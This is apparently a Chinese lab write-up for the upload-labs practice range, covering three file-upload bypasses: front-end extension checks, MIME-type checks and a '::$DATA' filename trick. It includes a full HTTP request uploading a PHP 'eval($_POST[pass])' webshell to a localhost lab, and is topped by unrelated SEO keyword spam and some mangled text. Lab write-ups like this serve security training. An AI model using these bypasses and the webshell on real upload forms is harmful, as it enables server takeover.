360网站建设价格,关键词优化报价怎么样,搜索引擎seo,apache发布多个网站upload-labs靶场
第一关 绕过前端
先打开哥斯拉#xff0c;生成木马#xff0c;选择php 打开brup开浏览器#xff0c;上传文件#xff0c;就会发现被阻止了#xff0c;还没抓到包呢
那就是被前端代码阻止了#xff0c;那通常前端代码都只能防御后缀名
我们抓到包后直… upload-labs靶场
第一关 绕过前端
先打开哥斯拉生成木马选择php 打开brup开浏览器上传文件就会发现被阻止了还没抓到包呢
那就是被前端代码阻止了那通常前端代码都只能防御后缀名
我们抓到包后直接改回名称即可
那就先复制木马文件再改成 .png 图片格式结尾 然后打开抓包上传绕过前端就能看到抓去的数据包了 改回去php即可 右键查看一下图片就会发现图片地址都给我们了 # 所以木马位置在这里
http://127.0.0.1/upload-labs-master/upload/gesila.php
上哥斯拉测试连接没毛病下一题 第二关 绕过后端的类型判断
第二关可以用第一关的方法但不知道为什么可以于是看了一下源码原来是类型绕过了
上传图片的时候类型自动是图片类型而这关可以直接用php文件上传
抓包改成图片类型就行了连后缀名都不需要改 第三关 隐藏流文件双写绕过
上传木马文件数据包增加下面东西其实我也没看太懂
但可能会是一个比较实用的技巧
因为我看了一下源代码源码是用php代码写常量数组判断后缀名是否在数组的后缀名中
所以这是很常见的防御写法这种破解应该是比较实用的 完整数据包如下
POST /upload-labs-master/Pass-03/index.php?actionshow_code HTTP/1.1
Host: 127.0.0.1
Content-Length: 348
Cache-Control: max-age0
sec-ch-ua: Not A;Brand;v99, Chromium;v96
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: Windows
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryRSR1Z7D37x0XoKBw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/upload-labs-master/Pass-03/index.php?actionshow_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Cookie: PHPSESSIDahreltidkjthrep12lbfgq9got
Connection: close------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; nameupload_file; filenamegesila.php::$DA::$DATATA
Content-Type: application/octet-stream?php
eval($_POST[pass]);------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; namesubmit涓婁紶
------WebKitFormBoundaryRSR1Z7D37x0XoKBw--上传之后需要查看文件名是什么不然没法搞 这个文件名一半看懂一半没看懂原理也没查到
反正前面就是年月日后面一半就不知道是什么来的了所以需要看到有文件名才能getshell